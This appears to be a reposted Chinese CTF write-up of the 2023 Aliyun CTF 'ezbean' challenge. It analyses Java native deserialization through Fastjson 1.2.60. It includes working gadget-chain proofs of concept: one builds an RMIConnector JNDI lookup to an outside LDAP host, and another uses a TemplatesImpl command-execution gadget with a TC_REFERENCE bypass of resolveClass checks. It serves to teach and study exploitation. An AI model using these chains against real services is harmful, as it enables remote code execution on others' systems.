Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )

这篇具有很好参考价值的文章主要介绍了Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

2023 Aliyun CTF ezbean是一道CTF java反序列化题目。 题目的目的是让选手通过一个java原生反序列化入口,最终达成RCE。本文对题目的几种解法做了具体的分析,主要分为预期解法和非预期解法两种思路。通过对Fastjson在反序列化的行为分析,从两个方向攻克本题。

预期解

题目的逻辑简单清晰,通过 /read 路由可以传入 data 参数进行反序列化。题目的依赖就是 springboot 和 fastjson1.2.60 。

package com.ctf.ezser.utils;

import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputStream;
import java.io.ObjectStreamClass;
import java.util.Arrays;
import java.util.HashSet;
import java.util.Set;

public class MyObjectInputStream extends ObjectInputStream {

   private static final String[] blacklist = new String[]{
           "java\\.security.*", "java\\.rmi.*",  "com\\.fasterxml.*", "com\\.ctf\\.*",
           "org\\.springframework.*", "org\\.yaml.*", "javax\\.management\\.remote.*"
   };

   public MyObjectInputStream(InputStream inputStream) throws IOException {
      super(inputStream);
   }

   protected Class resolveClass(ObjectStreamClass cls) throws IOException, ClassNotFoundException {
      if(!contains(cls.getName())) {
         return super.resolveClass(cls);
      } else {
         throw new InvalidClassException("Unexpected serialized class", cls.getName());
      }
   }

   public static boolean contains(String targetValue) {
      for (String forbiddenPackage : blacklist) {
         if (targetValue.matches(forbiddenPackage))
            return true;
      }
      return false;
   }
}

可以看到 MyObjectInputStream 继承 ObjectInputStream 并重写了 resolveClass() 方法,对反序列化的类进行了检查。

结合黑名单容易想到需要进行二次反序列化,但是常见的二次反序列化的起点类都被 ban 了,结合 pom.xml 中的 Fastjson 依赖考虑使用 Fastjson 进行反序列化。结合题目给的 MyBean 类

package com.ctf.ezser.bean;

import java.io.IOException;
import java.io.Serializable;
import javax.management.remote.JMXConnector;

public class MyBean implements Serializable {

   private Object url;
   private Object message;
   private JMXConnector conn;


   public MyBean() {}

   public MyBean(Object url, Object message) {
      this.url = url;
      this.message = message;
   }

   public MyBean(Object url, Object message, JMXConnector conn) {
      this.url = url;
      this.message = message;
      this.conn = conn;
   }

   public String getConnect() throws IOException {
      try {
         this.conn.connect();
         return "success";
      } catch (IOException var2) {
         return "fail";
      }
   }

   public void connect() {}

   public Object getMessage() {
      return this.message;
   }

   public void setMessage(Object message) {
      this.message = message;
   }

   public Object getUrl() {
      return this.url;
   }

   public void setUrl(Object url) {
      this.url = url;
   }
}

JMXConnector 接口的实现类在题目环境下仅存在 RMIConnector 一种实现类,结合 JMXService 可以在调用 getConnect() 方法时触发 JNDI 查询。这里不难想到利用 Fastjson 调用 Mybean 的 getter 方法。

结合题目可以想到利用 javax.management.BadAttributeValueExpException 作为反序列化起点,这个 BadAttributeException 在反序列化时会对自己的 val 属性调用 toString 方法。

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

将 JSONObject 作为 val ,也就相当于调用了 JSONObejct 的 toString() 方法。在 Fastjson<=1.2.48 时 Fastjson 没有实现自己的反序列化逻辑,但在高于 1.2.48 时 Fastjson 的 JSONObject 和 JSONArray 都实现了自己的 readObject()方法。Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

使用自己的 SecureObjectInputStream 包裹输入流从中获取序列化数据。

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

其中的 resolveClass 会调用 Fastjson 的 checkAutoType 来检查反序列化的数据是否合法。RMIConnector 和 JMXService 在 Fastjson 1.2.60 中均不属于黑名单,按照 AutoType 的逻辑

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

这里 name 就是 classname 类名。expectClass 为 null。按照这里 autoTypeSupport 应该为 true 才不会 throw error,但是我们实际尝试发现其实并不会报错,但是我们也并没有手动开启 autoType。这是因为在调用 checkAutoType 函数时我们传入的最后一个参数为 Feature.SupportAutoType.mask 而我们进行比较时用的是 feature & Feature.SupportAutoType.mask ,这里 feature 就是我们传入的 Feature.SupportAutoType.mask,这样就相当于传入了开启 autoType 的选项。

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

这里经过 mask 后为 true,也就相当于开启了 autoTypeSupport 。

JSONObject json= new JSONObject();
JMXServiceURL jmxServiceURL = new JMXServiceURL("service:jmx:rmi:///jndi/ldap://xxx.xxx.xxx.xxx:1389/Tomcat");
RMIConnector rmiConnector = new RMIConnector(jmxServiceURL,null);
MyBean myBean = new MyBean("a","a", rmiConnector);
json.put("YYY", myBean);
BadAttributeValueExpException poc = new BadAttributeValueExpException(1);
Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
val.setAccessible(true);
val.set(poc,json);
byte[] code =  serialize(poc);
deserialize(code);

会出 Exception

exception in thread “main” com.alibaba.fastjson.JSONException: default constructor not found. class javax.management.remote.rmi.RMIConnector at com.alibaba.fastjson.util.JavaBeanInfo.build(JavaBeanInfo.java:516) at com.alibaba.fastjson.util.JavaBeanInfo.build(JavaBeanInfo.java:221)

阅读 JavaBeanInfo 逻辑可以知道它会尝试获取无参构造函数,我们的 RMIConnector 和 JMXService 都不具备无参数公有构造函数的条件,所以在这里一定会报错。当时比赛卡这里了,后来看了 WP 才知道,多打几次就可以。只需要多 deserialize(code); 几次即可,StrewHat 的 wp 写的是因为 fastjson 构造函数是随机获取,其实并非如此。我们来详细看一下为什么多反序列化几次就可以。Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

这里抛出异常

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

这里遍历了全部构造函数,寻找符合要求的构造函数,都找不到所以报错,这里阅读逻辑后发现和顺序没有关系,因为

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

无论运行多少次都会完整遍历 DeclaredCtor 。那为什么进行多次反序列化后,就可以正常反序列化呢?继续向前看,在 ParserConfig 中

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

在 build 之前把这个类缓存了,存在一个 static 的 mapping 中

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

在第二次反序列化时Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

会在上层代码尝试从缓存获取类中拿到类因而提前返回。也就走不到

JavaBeanInfo.build 这一步,也就不会报错找不到默认构造函数了。因此只需要多打几次 payload 就能成功 rce 。

非预期解

Y4tacker 师傅前段时间发布了一篇(https://paper.seebug.org/2055/)关于

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

的文章,文中提到低版本才能利用,但其实高版本也能利用,这是因为后来有师傅提出可以利用 java 序列化机制中的引用机制来进行绕过

  • https://www.cnpanda.net/sec/928.html
  • https://y4tacker.github.io/2023/04/26/year/2023/4/FastJson%E4%B8%8E%E5%8E%9F%E7%94%9F%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96-%E4%BA%8C/#%E5%AE%8C%E6%95%B4%E5%88%A9%E7%94%A8

简单来说,高版本不能利用的原因是因为 Fastjson 的 readObject 实现了自己的 resolveClass 逻辑,会 ban 黑名单中的类,比如 TemplatesImpl

Object tpl = createTemplatesImpl("open -a Calculator.app");
        JSONObject jsonObject = new JSONObject();
        jsonObject.put("gg",tpl);

        BadAttributeValueExpException poc = new BadAttributeValueExpException(null);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc,jsonObject);

反序列化时会因为 TemplatesImpl 处于 fastjson 的黑名单中而被禁止反序列化

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

这里我们的**思路就转变为如何绕过 resolveClass 函数检查。**通过对 java 原生反序列化流程的学习,我们先看在啥时候 java 会去调用 resolveClass ,毕竟反序列化的数据类型也有很多。Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

也就是只有 TC_CLASSDESC 会调用 readNonProxyDesc -> resolveClass 。由于我们要尝试绕过的东西本质是一个类,所以这里我们能选择的就是 TC_REFERENCE 或者 TC_PROXYCLASSDESC我们先看看能不能用代理类绕过

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

可以看到在序列化过程中会使用反射判断一个类是否是代理类,若是代理类则写入 TC_PROXYCLASSDESCFastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

反序列过程中会重建代理类,对于 TemplatesImpl 显然行不通

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

一路走不通只能考虑用 TC_REFERENCE 了在序列化过程中

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

如果在 handles 中查到缓存的 obj,那就直接写 TC_REFERENCE

Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型

也就不会调用 resolveClass

最终 poc,没有用到题目给的 ezBean

Object tpl = createTemplatesImpl("open -a Calculator.app");
        JSONObject jsonObject = new JSONObject();
        jsonObject.put("gg",tpl);

        BadAttributeValueExpException poc = new BadAttributeValueExpException(null);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(poc,jsonObject);
        HashMap hashMap = new HashMap();
        hashMap.put(tpl,poc);
        byte[] code =  serialize(poc);
        deserialize(code);

最新CTF题库【点击领取】

总结

这两种解法有一点异曲同工之妙,预期解利用 Fastjson 的缓存机制避免了找不到默认构造函数的问题,跳过了 BuildJavaBean 的环节;

非预期解则是利用了 Fastjson 中 readObject 不正确的处理序列化数据方式,导致 handle 中已经缓存序列化对象而跳过 resolveClass 进而不被 Fastjson 的 chekcAutoType 黑名单检测。

朋友们如果有需要全套《黑客&网络安全入门&进阶学习资源包》,点击下方链接即可前往免费获取
CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》

这份完整版的学习资料已经上传CSDN,也可以微信扫描下方CSDN官方认证二维码免费领取【保证100%免费
Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF ),java,python,开发语言,网络安全,网络,kubernetes,网络攻击模型文章来源地址https://www.toymoban.com/news/detail-730873.html

到了这里,关于Fastjson 结合 jdk 原生反序列化的利用手法 ( Aliyun CTF )的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • fastjson反序列化漏洞学习(一)

    Fastjson 是阿里巴巴开源的一个 Java 的 JSON 解析库。它提供了快速、高效、简洁的 JSON 解析功能。Fastjson 不仅支持常见的 JSON 数据类型(如字符串、数字、布尔值、数组、对象等),还支持 Java 原生数据类型(如整型、浮点型、数组、集合等)与 JSON 之间的互相转换。Fastjson 支

    2024年02月04日
    浏览(48)
  • 关于fastjson序列化失败的问题

    com.alibaba.fastjson2.JSONArray cannot be cast to com.alibaba.fastjson2.JSONArray 我们使用若依的架子把common抽离出来一个jar包,导致从redis中序列化出错 这是由于springboot-devtools 使用restartClassLoader加载了JSONArray 而上层controller中的JSONArray依然是AppClassLoader,两个不同的类加载器加载的JSONArray没法

    2024年02月13日
    浏览(42)
  • Java反序列化—Fastjson基础

    最近摆烂了很久,来学习一下fastjson Fastjson 是 Alibaba 开发的 Java 语言编写的高性能 JSON 库,用于将数据在 JSON 和 Java Object 之间互相转换。 提供两个主要接口来分别实现序列化和反序列化操作。 JSON.toJSONString 将 Java 对象转换为 json 对象,序列化的过程。 JSON.parseObject/JSON.pars

    2024年02月02日
    浏览(52)
  • FastJson中AutoType反序列化漏洞

    Fastjson1.2.80 反序列化漏洞情报,攻击者可以利用该漏洞攻击远程服务器, 可能会造成任意命令执行。在Fastjson=1.2.83的版本中,通过新的Gadgets链绕过autoType开关,在autoType关闭的情况下仍然可能可以绕过黑白名单防御机制,实现了反序列化漏洞利用的远程代码执行效果,同时,此

    2024年02月07日
    浏览(49)
  • Fastjson反序列化漏洞原理与复现

    Fastjson是java的一个库,可以将Java对象转化为json格式的字符串,也可以将json格式的字符串转化为Java对象。 Fastjson提供了 toJSONString() 和 parseObject() 方法来将Java对象与JSON相互转换。调用 toJSONString() 方法即可将对象转换成 JSON 字符串, parseObject() 方法则反过来将JSON字符串转换成

    2024年02月12日
    浏览(62)
  • Fastjson反序列化远程代码执行漏洞

    据国家网络与信息安全信息通报中心监测发现,开源Java开发组件Fastjson存在反序列化远程代码执行漏洞。攻击者可利用上述漏洞实施任意文件写入、服务端请求伪造等攻击行为,造成服务器权限被窃取、敏感信息泄漏等严重影响。 先贴一个解决漏洞的方案: 不过任何升级一

    2024年02月09日
    浏览(45)
  • 【java安全】FastJson反序列化漏洞浅析

    0x00.前言 前面我们学习了RMI和JNDI知识,接下来我们就可以来了解一下FastJson反序列化了 0x01.FastJson概述 FastJson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持 将JavaBean序列化为JSON字符串,也可以将JSON字符串反序列化到JavaBean 0x02.FastJson使用 首先我们需要使用

    2024年02月11日
    浏览(52)
  • 渗透测试-Fastjson反序列化漏洞getshell

    目录 前言 测试环境准备 dnslog测试 搭建rmi服务器准备恶意类 引用JdbcRowSetImpl攻击 反弹shell$命令执行 总结 :fastjson 1.2.24反序列化导致任意命令执行漏洞 注:本次渗透测试全在虚拟机中进行仅用于学习交流,请勿在实际网络中攻击他人服务器。 前言         最原始

    2024年02月07日
    浏览(60)
  • fastjson 1.2.24 反序列化漏洞(审计分析)

    环境 JDK 8u181 Fastjson 1.2.24 POC 跟进 parse 方法 跟进到底层deserialze 方法 Poc 中传入的 dataSourceName : ldap://192.168.3.229:8084/vnSYPYwMs 值 这里实际对应 setDataSourceName 方法,调用此方法并传入 ldap 跟进 setDataSourceName 方法,这里只是简单赋值   步出回此方法 继续步出,进入parseRest方法 跟进

    2023年04月14日
    浏览(44)
  • Jackson--FastJson--XStream--代码执行&&反序列化

    2.0.0 = FasterXML jackson-databind Version = 2.9.10.2 不受影响版本 FasterXML jackson-databind = 2.8.11.5 FasterXML jackson-databind = 2.9.10.3 POC: String json = \\\"[\\\"org.apache.xbean.propertyeditor.JndiConverter\\\", {\\\"asText\\\":\\\"ldap://localhost:1389/Exploit\\\"}]\\\"; FasterXML jackson-databind 2.x 2.9.10.8 POC String payload = \\\"[\\\"com.oracle.wls.shaded.org.apa

    2024年02月08日
    浏览(55)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包